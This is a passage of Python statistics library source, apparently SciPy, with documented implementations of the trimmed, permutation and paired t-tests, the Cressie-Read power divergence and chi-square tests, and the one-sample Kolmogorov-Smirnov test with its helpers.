Use the `trim` keyword to perform a trimmed (Yuen) t-test. For example,
using 20% trimming, ``trim=.2``, the test will reduce the impact of one
(``np.floor(trim*len(a))``) element from each tail of sample `a`. It will
have no effect on sample `b` because ``np.floor(trim*len(b))`` is 0.
>>> stats.ttest_ind(a, b, trim=.2)
Ttest_indResult(statistic=3.4463884028073513,
pvalue=0.01369338726499547)
"""
if not (0 <= trim < .5):
raise ValueError("Trimming percentage should be 0 <= `trim` < .5.")
a, b, axis = _chk2_asarray(a, b, axis)
# check both a and b
cna, npa = _contains_nan(a, nan_policy)
cnb, npb = _contains_nan(b, nan_policy)
contains_nan = cna or cnb
if npa == 'omit' or npb == 'omit':
nan_policy = 'omit'
if contains_nan and nan_policy == 'omit':
if permutations or trim != 0:
raise ValueError("nan-containing/masked inputs with "
"nan_policy='omit' are currently not "
"supported by permutation tests or "
"trimmed tests.")
a = ma.masked_invalid(a)
b = ma.masked_invalid(b)
return mstats_basic.ttest_ind(a, b, axis, equal_var, alternative)
if a.size == 0 or b.size == 0:
return _ttest_nans(a, b, axis, Ttest_indResult)
if permutations is not None and permutations != 0:
if trim != 0:
raise ValueError("Permutations are currently not supported "
"with trimming.")
if permutations < 0 or (np.isfinite(permutations) and
int(permutations) != permutations):
raise ValueError("Permutations must be a non-negative integer.")
res = _permutation_ttest(a, b, permutations=permutations,
axis=axis, equal_var=equal_var,
nan_policy=nan_policy,
random_state=random_state,
alternative=alternative)
else:
n1 = a.shape[axis]
n2 = b.shape[axis]
if trim == 0:
v1 = np.var(a, axis, ddof=1)
v2 = np.var(b, axis, ddof=1)
m1 = np.mean(a, axis)
m2 = np.mean(b, axis)
else:
v1, m1, n1 = _ttest_trim_var_mean_len(a, trim, axis)
v2, m2, n2 = _ttest_trim_var_mean_len(b, trim, axis)
if equal_var:
df, denom = _equal_var_ttest_denom(v1, n1, v2, n2)
else:
df, denom = _unequal_var_ttest_denom(v1, n1, v2, n2)
res = _ttest_ind_from_stats(m1, m2, denom, df, alternative)
return Ttest_indResult(*res)
def _ttest_trim_var_mean_len(a, trim, axis):
"""Variance, mean, and length of winsorized input along specified axis"""
# for use with `ttest_ind` when trimming.
# further calculations in this test assume that the inputs are sorted.
# From [4] Section 1 "Let x_1, ..., x_n be n ordered observations..."
a = np.sort(a, axis=axis)
# `g` is the number of elements to be replaced on each tail, converted
# from a percentage amount of trimming
n = a.shape[axis]
g = int(n * trim)
# Calculate the Winsorized variance of the input samples according to
# specified `g`
v = _calculate_winsorized_variance(a, g, axis)
# the total number of elements in the trimmed samples
n -= 2 * g
# calculate the g-times trimmed mean, as defined in [4] (1-1)
m = trim_mean(a, trim, axis=axis)
return v, m, n
def _calculate_winsorized_variance(a, g, axis):
"""Calculates g-times winsorized variance along specified axis"""
# it is expected that the input `a` is sorted along the correct axis
if g == 0:
return np.var(a, ddof=1, axis=axis)
# move the intended axis to the end that way it is easier to manipulate
a_win = np.moveaxis(a, axis, -1)
# save where NaNs are for later use.
nans_indices = np.any(np.isnan(a_win), axis=-1)
# Winsorization and variance calculation are done in one step in [4]
# (1-3), but here winsorization is done first; replace the left and
# right sides with the repeating value. This can be see in effect in (
# 1-3) in [4], where the leftmost and rightmost tails are replaced with
# `(g + 1) * x_{g + 1}` on the left and `(g + 1) * x_{n - g}` on the
# right. Zero-indexing turns `g + 1` to `g`, and `n - g` to `- g - 1` in
# array indexing.
a_win[..., :g] = a_win[..., [g]]
a_win[..., -g:] = a_win[..., [-g - 1]]
# Determine the variance. In [4], the degrees of freedom is expressed as
# `h - 1`, where `h = n - 2g` (unnumbered equations in Section 1, end of
# page 369, beginning of page 370). This is converted to NumPy's format,
# `n - ddof` for use with with `np.var`. The result is converted to an
# array to accommodate indexing later.
var_win = np.asarray(np.var(a_win, ddof=(2 * g + 1), axis=-1))
# with `nan_policy='propagate'`, NaNs may be completely trimmed out
# because they were sorted into the tail of the array. In these cases,
# replace computed variances with `np.nan`.
var_win[nans_indices] = np.nan
return var_win
def _data_partitions(data, permutations, size_a, axis=-1, random_state=None):
"""All partitions of data into sets of given lengths, ignoring order"""
random_state = check_random_state(random_state)
if axis < 0: # we'll be adding a new dimension at the end
axis = data.ndim + axis
# prepare permutation indices
size = data.shape[axis]
# number of distinct combinations
n_max = special.comb(size, size_a)
if permutations < n_max:
indices = np.array([random_state.permutation(size)
for i in range(permutations)]).T
else:
permutations = n_max
indices = np.array([np.concatenate(z)
for z in _all_partitions(size_a, size-size_a)]).T
data = data.swapaxes(axis, -1) # so we can index along a new dimension
data = data[..., indices] # generate permutations
data = data.swapaxes(-2, axis) # restore original axis order
data = np.moveaxis(data, -1, 0) # permutations indexed along axis 0
return data, permutations
def _calc_t_stat(a, b, equal_var, axis=-1):
"""Calculate the t statistic along the given dimension."""
na = a.shape[axis]
nb = b.shape[axis]
avg_a = np.mean(a, axis=axis)
avg_b = np.mean(b, axis=axis)
var_a = np.var(a, axis=axis, ddof=1)
var_b = np.var(b, axis=axis, ddof=1)
if not equal_var:
denom = _unequal_var_ttest_denom(var_a, na, var_b, nb)[1]
else:
denom = _equal_var_ttest_denom(var_a, na, var_b, nb)[1]
return (avg_a-avg_b)/denom
def _permutation_ttest(a, b, permutations, axis=0, equal_var=True,
nan_policy='propagate', random_state=None,
alternative="two-sided"):
"""
Calculates the T-test for the means of TWO INDEPENDENT samples of scores
using permutation methods.
This test is similar to `stats.ttest_ind`, except it doesn't rely on an
approximate normality assumption since it uses a permutation test.
This function is only called from ttest_ind when permutations is not None.
Parameters
----------
a, b : array_like
The arrays must be broadcastable, except along the dimension
corresponding to `axis` (the zeroth, by default).
axis : int, optional
The axis over which to operate on a and b.
permutations : int, optional
Number of permutations used to calculate p-value. If greater than or
equal to the number of distinct permutations, perform an exact test.
equal_var : bool, optional
If False, an equal variance (Welch's) t-test is conducted. Otherwise,
an ordinary t-test is conducted.
random_state : {None, int, `numpy.random.Generator`}, optional
If `seed` is None the `numpy.random.Generator` singleton is used.
If `seed` is an int, a new ``Generator`` instance is used,
seeded with `seed`.
If `seed` is already a ``Generator`` instance then that instance is
used.
Pseudorandom number generator state used for generating random
permutations.
Returns
-------
statistic : float or array
The calculated t-statistic.
pvalue : float or array
The p-value.
"""
random_state = check_random_state(random_state)
t_stat_observed = _calc_t_stat(a, b, equal_var, axis=axis)
na = a.shape[axis]
mat = _broadcast_concatenate((a, b), axis=axis)
mat = np.moveaxis(mat, axis, -1)
mat_perm, permutations = _data_partitions(mat, permutations, size_a=na,
random_state=random_state)
a = mat_perm[..., :na]
b = mat_perm[..., na:]
t_stat = _calc_t_stat(a, b, equal_var)
compare = {"less": np.less_equal,
"greater": np.greater_equal,
"two-sided": lambda x, y: (x <= -np.abs(y)) | (x >= np.abs(y))}
# Calculate the p-values
cmps = compare[alternative](t_stat, t_stat_observed)
pvalues = cmps.sum(axis=0) / permutations
# nans propagate naturally in statistic calculation, but need to be
# propagated manually into pvalues
if nan_policy == 'propagate' and np.isnan(t_stat_observed).any():
if np.ndim(pvalues) == 0:
pvalues = np.float64(np.nan)
else:
pvalues[np.isnan(t_stat_observed)] = np.nan
return (t_stat_observed, pvalues)
def _get_len(a, axis, msg):
try:
n = a.shape[axis]
except IndexError:
raise np.AxisError(axis, a.ndim, msg) from None
return n
Ttest_relResult = namedtuple('Ttest_relResult', ('statistic', 'pvalue'))
def ttest_rel(a, b, axis=0, nan_policy='propagate', alternative="two-sided"):
"""Calculate the t-test on TWO RELATED samples of scores, a and b.
This is a test for the null hypothesis that two related or
repeated samples have identical average (expected) values.
Parameters
----------
a, b : array_like
The arrays must have the same shape.
axis : int or None, optional
Axis along which to compute test. If None, compute over the whole
arrays, `a`, and `b`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided': the means of the distributions underlying the samples
are unequal.
* 'less': the mean of the distribution underlying the first sample
is less than the mean of the distribution underlying the second
sample.
* 'greater': the mean of the distribution underlying the first
sample is greater than the mean of the distribution underlying
the second sample.
.. versionadded:: 1.6.0
Returns
-------
statistic : float or array
t-statistic.
pvalue : float or array
The p-value.
Notes
-----
Examples for use are scores of the same set of student in
different exams, or repeated sampling from the same units. The
test measures whether the average score differs significantly
across samples (e.g. exams). If we observe a large p-value, for
example greater than 0.05 or 0.1 then we cannot reject the null
hypothesis of identical average scores. If the p-value is smaller
than the threshold, e.g. 1%, 5% or 10%, then we reject the null
hypothesis of equal averages. Small p-values are associated with
large t-statistics.
References
----------
https://en.wikipedia.org/wiki/T-test#Dependent_t-test_for_paired_samples
Examples
--------
>>> from scipy import stats
>>> rng = np.random.default_rng()
>>> rvs1 = stats.norm.rvs(loc=5, scale=10, size=500, random_state=rng)
>>> rvs2 = (stats.norm.rvs(loc=5, scale=10, size=500, random_state=rng)
... + stats.norm.rvs(scale=0.2, size=500, random_state=rng))
>>> stats.ttest_rel(rvs1, rvs2)
Ttest_relResult(statistic=-0.4549717054410304, pvalue=0.6493274702088672)
>>> rvs3 = (stats.norm.rvs(loc=8, scale=10, size=500, random_state=rng)
... + stats.norm.rvs(scale=0.2, size=500, random_state=rng))
>>> stats.ttest_rel(rvs1, rvs3)
Ttest_relResult(statistic=-5.879467544540889, pvalue=7.540777129099917e-09)
"""
a, b, axis = _chk2_asarray(a, b, axis)
cna, npa = _contains_nan(a, nan_policy)
cnb, npb = _contains_nan(b, nan_policy)
contains_nan = cna or cnb
if npa == 'omit' or npb == 'omit':
nan_policy = 'omit'
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
b = ma.masked_invalid(b)
m = ma.mask_or(ma.getmask(a), ma.getmask(b))
aa = ma.array(a, mask=m, copy=True)
bb = ma.array(b, mask=m, copy=True)
return mstats_basic.ttest_rel(aa, bb, axis, alternative)
na = _get_len(a, axis, "first argument")
nb = _get_len(b, axis, "second argument")
if na != nb:
raise ValueError('unequal length arrays')
if na == 0:
return _ttest_nans(a, b, axis, Ttest_relResult)
n = a.shape[axis]
df = n - 1
d = (a - b).astype(np.float64)
v = np.var(d, axis, ddof=1)
dm = np.mean(d, axis)
denom = np.sqrt(v / n)
with np.errstate(divide='ignore', invalid='ignore'):
t = np.divide(dm, denom)
t, prob = _ttest_finish(df, t, alternative)
return Ttest_relResult(t, prob)
# Map from names to lambda_ values used in power_divergence().
_power_div_lambda_names = {
"pearson": 1,
"log-likelihood": 0,
"freeman-tukey": -0.5,
"mod-log-likelihood": -1,
"neyman": -2,
"cressie-read": 2/3,
}
def _count(a, axis=None):
"""Count the number of non-masked elements of an array.
This function behaves like `np.ma.count`, but is much faster
for ndarrays.
"""
if hasattr(a, 'count'):
num = a.count(axis=axis)
if isinstance(num, np.ndarray) and num.ndim == 0:
# In some cases, the `count` method returns a scalar array (e.g.
# np.array(3)), but we want a plain integer.
num = int(num)
else:
if axis is None:
num = a.size
else:
num = a.shape[axis]
return num
def _m_broadcast_to(a, shape):
if np.ma.isMaskedArray(a):
return np.ma.masked_array(np.broadcast_to(a, shape),
mask=np.broadcast_to(a.mask, shape))
return np.broadcast_to(a, shape, subok=True)
Power_divergenceResult = namedtuple('Power_divergenceResult',
('statistic', 'pvalue'))
def power_divergence(f_obs, f_exp=None, ddof=0, axis=0, lambda_=None):
"""Cressie-Read power divergence statistic and goodness of fit test.
This function tests the null hypothesis that the categorical data
has the given frequencies, using the Cressie-Read power divergence
statistic.
Parameters
----------
f_obs : array_like
Observed frequencies in each category.
f_exp : array_like, optional
Expected frequencies in each category. By default the categories are
assumed to be equally likely.
ddof : int, optional
"Delta degrees of freedom": adjustment to the degrees of freedom
for the p-value. The p-value is computed using a chi-squared
distribution with ``k - 1 - ddof`` degrees of freedom, where `k`
is the number of observed frequencies. The default value of `ddof`
is 0.
axis : int or None, optional
The axis of the broadcast result of `f_obs` and `f_exp` along which to
apply the test. If axis is None, all values in `f_obs` are treated
as a single data set. Default is 0.
lambda_ : float or str, optional
The power in the Cressie-Read power divergence statistic. The default
is 1. For convenience, `lambda_` may be assigned one of the following
strings, in which case the corresponding numerical value is used:
* ``"pearson"`` (value 1)
Pearson's chi-squared statistic. In this case, the function is
equivalent to `chisquare`.
* ``"log-likelihood"`` (value 0)
Log-likelihood ratio. Also known as the G-test [3]_.
* ``"freeman-tukey"`` (value -1/2)
Freeman-Tukey statistic.
* ``"mod-log-likelihood"`` (value -1)
Modified log-likelihood ratio.
* ``"neyman"`` (value -2)
Neyman's statistic.
* ``"cressie-read"`` (value 2/3)
The power recommended in [5]_.
Returns
-------
statistic : float or ndarray
The Cressie-Read power divergence test statistic. The value is
a float if `axis` is None or if` `f_obs` and `f_exp` are 1-D.
pvalue : float or ndarray
The p-value of the test. The value is a float if `ddof` and the
return value `stat` are scalars.
See Also
--------
chisquare
Notes
-----
This test is invalid when the observed or expected frequencies in each
category are too small. A typical rule is that all of the observed
and expected frequencies should be at least 5.
Also, the sum of the observed and expected frequencies must be the same
for the test to be valid; `power_divergence` raises an error if the sums
do not agree within a relative tolerance of ``1e-8``.
When `lambda_` is less than zero, the formula for the statistic involves
dividing by `f_obs`, so a warning or error may be generated if any value
in `f_obs` is 0.
Similarly, a warning or error may be generated if any value in `f_exp` is
zero when `lambda_` >= 0.
The default degrees of freedom, k-1, are for the case when no parameters
of the distribution are estimated. If p parameters are estimated by
efficient maximum likelihood then the correct degrees of freedom are
k-1-p. If the parameters are estimated in a different way, then the
dof can be between k-1-p and k-1. However, it is also possible that
the asymptotic distribution is not a chisquare, in which case this
test is not appropriate.
This function handles masked arrays. If an element of `f_obs` or `f_exp`
is masked, then data at that position is ignored, and does not count
towards the size of the data set.
.. versionadded:: 0.13.0
References
----------
.. [1] Lowry, Richard. "Concepts and Applications of Inferential
Statistics". Chapter 8.
https://web.archive.org/web/20171015035606/http://faculty.vassar.edu/lowry/ch8pt1.html
.. [2] "Chi-squared test", https://en.wikipedia.org/wiki/Chi-squared_test
.. [3] "G-test", https://en.wikipedia.org/wiki/G-test
.. [4] Sokal, R. R. and Rohlf, F. J. "Biometry: the principles and
practice of statistics in biological research", New York: Freeman
(1981)
.. [5] Cressie, N. and Read, T. R. C., "Multinomial Goodness-of-Fit
Tests", J. Royal Stat. Soc. Series B, Vol. 46, No. 3 (1984),
pp. 440-464.
Examples
--------
(See `chisquare` for more examples.)
When just `f_obs` is given, it is assumed that the expected frequencies
are uniform and given by the mean of the observed frequencies. Here we
perform a G-test (i.e. use the log-likelihood ratio statistic):
>>> from scipy.stats import power_divergence
>>> power_divergence([16, 18, 16, 14, 12, 12], lambda_='log-likelihood')
(2.006573162632538, 0.84823476779463769)
The expected frequencies can be given with the `f_exp` argument:
>>> power_divergence([16, 18, 16, 14, 12, 12],
... f_exp=[16, 16, 16, 16, 16, 8],
... lambda_='log-likelihood')
(3.3281031458963746, 0.6495419288047497)
When `f_obs` is 2-D, by default the test is applied to each column.
>>> obs = np.array([[16, 18, 16, 14, 12, 12], [32, 24, 16, 28, 20, 24]]).T
>>> obs.shape
(6, 2)
>>> power_divergence(obs, lambda_="log-likelihood")
(array([ 2.00657316, 6.77634498]), array([ 0.84823477, 0.23781225]))
By setting ``axis=None``, the test is applied to all data in the array,
which is equivalent to applying the test to the flattened array.
>>> power_divergence(obs, axis=None)
(23.31034482758621, 0.015975692534127565)
>>> power_divergence(obs.ravel())
(23.31034482758621, 0.015975692534127565)
`ddof` is the change to make to the default degrees of freedom.
>>> power_divergence([16, 18, 16, 14, 12, 12], ddof=1)
(2.0, 0.73575888234288467)
The calculation of the p-values is done by broadcasting the
test statistic with `ddof`.
>>> power_divergence([16, 18, 16, 14, 12, 12], ddof=[0,1,2])
(2.0, array([ 0.84914504, 0.73575888, 0.5724067 ]))
`f_obs` and `f_exp` are also broadcast. In the following, `f_obs` has
shape (6,) and `f_exp` has shape (2, 6), so the result of broadcasting
`f_obs` and `f_exp` has shape (2, 6). To compute the desired chi-squared
statistics, we must use ``axis=1``:
>>> power_divergence([16, 18, 16, 14, 12, 12],
... f_exp=[[16, 16, 16, 16, 16, 8],
... [8, 20, 20, 16, 12, 12]],
... axis=1)
(array([ 3.5 , 9.25]), array([ 0.62338763, 0.09949846]))
"""
# Convert the input argument `lambda_` to a numerical value.
if isinstance(lambda_, str):
if lambda_ not in _power_div_lambda_names:
names = repr(list(_power_div_lambda_names.keys()))[1:-1]
raise ValueError("invalid string for lambda_: {0!r}. "
"Valid strings are {1}".format(lambda_, names))
lambda_ = _power_div_lambda_names[lambda_]
elif lambda_ is None:
lambda_ = 1
f_obs = np.asanyarray(f_obs)
f_obs_float = f_obs.astype(np.float64)
if f_exp is not None:
f_exp = np.asanyarray(f_exp)
bshape = _broadcast_shapes(f_obs_float.shape, f_exp.shape)
f_obs_float = _m_broadcast_to(f_obs_float, bshape)
f_exp = _m_broadcast_to(f_exp, bshape)
rtol = 1e-8 # to pass existing tests
with np.errstate(invalid='ignore'):
f_obs_sum = f_obs_float.sum(axis=axis)
f_exp_sum = f_exp.sum(axis=axis)
relative_diff = (np.abs(f_obs_sum - f_exp_sum) /
np.minimum(f_obs_sum, f_exp_sum))
diff_gt_tol = (relative_diff > rtol).any()
if diff_gt_tol:
msg = (f"For each axis slice, the sum of the observed "
f"frequencies must agree with the sum of the "
f"expected frequencies to a relative tolerance "
f"of {rtol}, but the percent differences are:\n"
f"{relative_diff}")
raise ValueError(msg)
else:
# Ignore 'invalid' errors so the edge case of a data set with length 0
# is handled without spurious warnings.
with np.errstate(invalid='ignore'):
f_exp = f_obs.mean(axis=axis, keepdims=True)
# `terms` is the array of terms that are summed along `axis` to create
# the test statistic. We use some specialized code for a few special
# cases of lambda_.
if lambda_ == 1:
# Pearson's chi-squared statistic
terms = (f_obs_float - f_exp)**2 / f_exp
elif lambda_ == 0:
# Log-likelihood ratio (i.e. G-test)
terms = 2.0 * special.xlogy(f_obs, f_obs / f_exp)
elif lambda_ == -1:
# Modified log-likelihood ratio
terms = 2.0 * special.xlogy(f_exp, f_exp / f_obs)
else:
# General Cressie-Read power divergence.
terms = f_obs * ((f_obs / f_exp)**lambda_ - 1)
terms /= 0.5 * lambda_ * (lambda_ + 1)
stat = terms.sum(axis=axis)
num_obs = _count(terms, axis=axis)
ddof = asarray(ddof)
p = distributions.chi2.sf(stat, num_obs - 1 - ddof)
return Power_divergenceResult(stat, p)
def chisquare(f_obs, f_exp=None, ddof=0, axis=0):
"""Calculate a one-way chi-square test.
The chi-square test tests the null hypothesis that the categorical data
has the given frequencies.
Parameters
----------
f_obs : array_like
Observed frequencies in each category.
f_exp : array_like, optional
Expected frequencies in each category. By default the categories are
assumed to be equally likely.
ddof : int, optional
"Delta degrees of freedom": adjustment to the degrees of freedom
for the p-value. The p-value is computed using a chi-squared
distribution with ``k - 1 - ddof`` degrees of freedom, where `k`
is the number of observed frequencies. The default value of `ddof`
is 0.
axis : int or None, optional
The axis of the broadcast result of `f_obs` and `f_exp` along which to
apply the test. If axis is None, all values in `f_obs` are treated
as a single data set. Default is 0.
Returns
-------
chisq : float or ndarray
The chi-squared test statistic. The value is a float if `axis` is
None or `f_obs` and `f_exp` are 1-D.
p : float or ndarray
The p-value of the test. The value is a float if `ddof` and the
return value `chisq` are scalars.
See Also
--------
scipy.stats.power_divergence
scipy.stats.fisher_exact : Fisher exact test on a 2x2 contingency table.
scipy.stats.barnard_exact : An unconditional exact test. An alternative
to chi-squared test for small sample sizes.
Notes
-----
This test is invalid when the observed or expected frequencies in each
category are too small. A typical rule is that all of the observed
and expected frequencies should be at least 5. According to [3]_, the
total number of samples is recommended to be greater than 13,
otherwise exact tests (such as Barnard's Exact test) should be used
because they do not overreject.
Also, the sum of the observed and expected frequencies must be the same
for the test to be valid; `chisquare` raises an error if the sums do not
agree within a relative tolerance of ``1e-8``.
The default degrees of freedom, k-1, are for the case when no parameters
of the distribution are estimated. If p parameters are estimated by
efficient maximum likelihood then the correct degrees of freedom are
k-1-p. If the parameters are estimated in a different way, then the
dof can be between k-1-p and k-1. However, it is also possible that
the asymptotic distribution is not chi-square, in which case this test
is not appropriate.
References
----------
.. [1] Lowry, Richard. "Concepts and Applications of Inferential
Statistics". Chapter 8.
https://web.archive.org/web/20171022032306/http://vassarstats.net:80/textbook/ch8pt1.html
.. [2] "Chi-squared test", https://en.wikipedia.org/wiki/Chi-squared_test
.. [3] Pearson, Karl. "On the criterion that a given system of deviations from the probable
in the case of a correlated system of variables is such that it can be reasonably
supposed to have arisen from random sampling", Philosophical Magazine. Series 5. 50
(1900), pp. 157-175.
Examples
--------
When just `f_obs` is given, it is assumed that the expected frequencies
are uniform and given by the mean of the observed frequencies.
>>> from scipy.stats import chisquare
>>> chisquare([16, 18, 16, 14, 12, 12])
(2.0, 0.84914503608460956)
With `f_exp` the expected frequencies can be given.
>>> chisquare([16, 18, 16, 14, 12, 12], f_exp=[16, 16, 16, 16, 16, 8])
(3.5, 0.62338762774958223)
When `f_obs` is 2-D, by default the test is applied to each column.
>>> obs = np.array([[16, 18, 16, 14, 12, 12], [32, 24, 16, 28, 20, 24]]).T
>>> obs.shape
(6, 2)
>>> chisquare(obs)
(array([ 2. , 6.66666667]), array([ 0.84914504, 0.24663415]))
By setting ``axis=None``, the test is applied to all data in the array,
which is equivalent to applying the test to the flattened array.
>>> chisquare(obs, axis=None)
(23.31034482758621, 0.015975692534127565)
>>> chisquare(obs.ravel())
(23.31034482758621, 0.015975692534127565)
`ddof` is the change to make to the default degrees of freedom.
>>> chisquare([16, 18, 16, 14, 12, 12], ddof=1)
(2.0, 0.73575888234288467)
The calculation of the p-values is done by broadcasting the
chi-squared statistic with `ddof`.
>>> chisquare([16, 18, 16, 14, 12, 12], ddof=[0,1,2])
(2.0, array([ 0.84914504, 0.73575888, 0.5724067 ]))
`f_obs` and `f_exp` are also broadcast. In the following, `f_obs` has
shape (6,) and `f_exp` has shape (2, 6), so the result of broadcasting
`f_obs` and `f_exp` has shape (2, 6). To compute the desired chi-squared
statistics, we use ``axis=1``:
>>> chisquare([16, 18, 16, 14, 12, 12],
... f_exp=[[16, 16, 16, 16, 16, 8], [8, 20, 20, 16, 12, 12]],
... axis=1)
(array([ 3.5 , 9.25]), array([ 0.62338763, 0.09949846]))
"""
return power_divergence(f_obs, f_exp=f_exp, ddof=ddof, axis=axis,
lambda_="pearson")
KstestResult = namedtuple('KstestResult', ('statistic', 'pvalue'))
def _compute_dplus(cdfvals):
"""Computes D+ as used in the Kolmogorov-Smirnov test.
Parameters
----------
cdfvals : array_like
Sorted array of CDF values between 0 and 1
Returns
-------
Maximum distance of the CDF values below Uniform(0, 1)
"""
n = len(cdfvals)
return (np.arange(1.0, n + 1) / n - cdfvals).max()
def _compute_dminus(cdfvals):
"""Computes D- as used in the Kolmogorov-Smirnov test.
Parameters
----------
cdfvals : array_like
Sorted array of CDF values between 0 and 1
Returns
-------
Maximum distance of the CDF values above Uniform(0, 1)
"""
n = len(cdfvals)
return (cdfvals - np.arange(0.0, n)/n).max()
def ks_1samp(x, cdf, args=(), alternative='two-sided', mode='auto'):
"""
Performs the one-sample Kolmogorov-Smirnov test for goodness of fit.
This test compares the underlying distribution F(x) of a sample
against a given continuous distribution G(x). See Notes for a description
of the available null and alternative hypotheses.
Parameters
----------
x : array_like
a 1-D array of observations of iid random variables.
cdf : callable
callable used to calculate the cdf.
args : tuple, sequence, optional
Distribution parameters, used with `cdf`.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the null and alternative hypotheses. Default is 'two-sided'.
Please see explanations in the Notes below.
mode : {'auto', 'exact', 'approx', 'asymp'}, optional
Defines the distribution used for calculating the p-value.
The following options are available (default is 'auto'):
* 'auto' : selects one of the other options.
* 'exact' : uses the exact distribution of test statistic.
* 'approx' : approximates the two-sided probability with twice
the one-sided probability
* 'asymp': uses asymptotic distribution of test statistic
Returns
-------
statistic : float
KS test statistic, either D, D+ or D- (depending on the value
of 'alternative')
pvalue : float
One-tailed or two-tailed p-value.
See Also
--------
ks_2samp, kstest
Notes
-----
There are three options for the null and corresponding alternative
hypothesis that can be selected using the `alternative` parameter.
- `two-sided`: The null hypothesis is that the two distributions are
identical, F(x)=G(x) for all x; the alternative is that they are not
identical.
- `less`: The null hypothesis is that F(x) >= G(x) for all x; the
alternative is that F(x) < G(x) for at least one x.
- `greater`: The null hypothesis is that F(x) <= G(x) for all x; the
alternative is that F(x) > G(x) for at least one x.
Note that the alternative hypotheses describe the *CDFs* of the
underlying distributions, not the observed values. For example,
suppose x1 ~ F and x2 ~ G. If F(x) > G(x) for all x, the values in
x1 tend to be less than those in x2.
Examples
--------
>>> from scipy import stats
>>> rng = np.random.default_rng()
>>> x = np.linspace(-15, 15, 9)
>>> stats.ks_1samp(x, stats.norm.cdf)
(0.44435602715924361, 0.038850142705171065)
>>> stats.ks_1samp(stats.norm.rvs(size=100, random_state=rng),
... stats.norm.cdf)
KstestResult(statistic=0.165471391799..., pvalue=0.007331283245...)
*Test against one-sided alternative hypothesis*
Shift distribution to larger values, so that `` CDF(x) < norm.cdf(x)``:
>>> x = stats.norm.rvs(loc=0.2, size=100, random_state=rng)
>>> stats.ks_1samp(x, stats.norm.cdf, alternative='less')
KstestResult(statistic=0.100203351482..., pvalue=0.125544644447...)
Reject null hypothesis in favor of alternative hypothesis: less
>>> stats.ks_1samp(x, stats.norm.cdf, alternative='greater')
KstestResult(statistic=0.018749806388..., pvalue=0.920581859791...)
Reject null hypothesis in favor of alternative hypothesis: greater
>>> stats.ks_1samp(x, stats.norm.cdf)
KstestResult(statistic=0.100203351482..., pvalue=0.250616879765...)
Don't reject null hypothesis in favor of alternative hypothesis: two-sided
*Testing t distributed random variables against normal distribution*
With 100 degrees of freedom the t distribution looks close to the normal
distribution, and the K-S test does not reject the hypothesis that the
sample came from the normal distribution:
>>> stats.ks_1samp(stats.t.rvs(100,size=100, random_state=rng),
... stats.norm.cdf)
KstestResult(statistic=0.064273776544..., pvalue=0.778737758305...)
With 3 degrees of freedom the t distribution looks sufficiently different
from the normal distribution, that we can reject the hypothesis that the
sample came from the normal distribution at the 10% level:
>>> stats.ks_1samp(stats.t.rvs(3,size=100, random_state=rng),
... stats.norm.cdf)
KstestResult(statistic=0.128678487493..., pvalue=0.066569081515...)
"""
alternative = {'t': 'two-sided', 'g': 'greater', 'l': 'less'}.get(
alternative.lower()[0], alternative)
if alternative not in ['two-sided', 'greater', 'less']:
raise ValueError("Unexpected alternative %s" % alternative)
if np.ma.is_masked(x):
x = x.compressed()
N = len(x)
x = np.sort(x)
cdfvals = cdf(x, *args)
if alternative == 'greater':
Dplus = _compute_dplus(cdfvals)
return KstestResult(Dplus, distributions.ksone.sf(Dplus, N))
if alternative == 'less':
Dminus = _compute_dminus(cdfvals)
return KstestResult(Dminus, distributions.ksone.sf(Dminus, N))
# alternative == 'two-sided':
Dplus = _compute_dplus(cdfvals)
Dminus = _compute_dminus(cdfvals)
D = np.max([Dplus, Dminus])
if mode == 'auto': # Always select exact
mode = 'exact'
if mode == 'exact':
prob = distributions.kstwo.sf(D, N)
elif mode == 'asymp':
prob = distributions.kstwobign.sf(D * np.sqrt(N))
else:
# mode == 'approx'
prob = 2 * distributions.ksone.sf(D, N)
prob = np.clip(prob, 0, 1)
return KstestResult(D, prob)
Ks_2sampResult = KstestResult
def _compute_prob_outside_square(n, h):
"""
Compute the proportion of paths that pass outside the two diagonal lines.
Parameters
----------
n : integer
n > 0
h : integer
0 <= h <= n
Returns
-------
p : float
The proportion of paths that pass outside the lines x-y = +/-h.
"""
# Compute Pr(D_{n,n} >= h/n)
# Prob = 2 * ( binom(2n, n-h) - binom(2n, n-2a) + binom(2n, n-3a) - ... )
# / binom(2n, n)
# This formulation exhibits subtractive cancellation.
# Instead divide each term by binom(2n, n), then factor common terms
# and use a Horner-like algorithm
# P = 2 * A0 * (1 - A1*(1 - A2*(1 - A3*(1 - A4*(...)))))
P = 0.0
k = int(np.floor(n / h))
while k >= 0:
p1 = 1.0
# Each of the Ai terms has numerator and denominator with
# h simple terms.
for j in range(h):
p1 = (n - k * h - j) * p1 / (n + k * h + j + 1)
P = p1 * (1.0 - P)
k -= 1
return 2 * P
def _count_paths_outside_method(m, n, g, h):
"""Count the number of paths that pass outside the specified diagonal.
Parameters
----------
m : integer
m > 0
n : integer
n > 0
g : integer
g is greatest common divisor of m and n
h : integer
0 <= h <= lcm(m,n)
Returns
-------
p : float
The number of paths that go low.
The calculation may overflow - check for a finite answer.
Raises
------
FloatingPointError: Raised if the intermediate computation goes outside
the range of a float.
Notes
-----
Count the integer lattice paths from (0, 0) to (m, n), which at some
point (x, y) along the path, satisfy:
m*y <= n*x - h*g
The paths make steps of size +1 in either positive x or positive y
directions.
We generally follow Hodges' treatment of Drion/Gnedenko/Korolyuk.
Hodges, J.L. Jr.,
"The Significance Probability of the Smirnov Two-Sample Test,"
Arkiv fiur Matematik, 3, No. 43 (1958), 469-86.
"""
# Compute #paths which stay lower than x/m-y/n = h/lcm(m,n)
# B(x, y) = #{paths from (0,0) to (x,y) without
# previously crossing the boundary}
# = binom(x, y) - #{paths which already reached the boundary}
# Multiply by the number of path extensions going from (x, y) to (m, n)
# Sum.
# Probability is symmetrical in m, n. Computation below assumes m >= n.
if m < n:
m, n = n, m
mg = m // g
ng = n // g
# Not every x needs to be considered.
# xj holds the list of x values to be checked.
# Wherever n*x/m + ng*h crosses an integer
lxj = n + (mg-h)//mg
xj = [(h + mg * j + ng-1)//ng for j in range(lxj)]
# B is an array just holding a few values of B(x,y), the ones needed.
# B[j] == B(x_j, j)
if lxj == 0:
return np.round(special.binom(m + n, n))
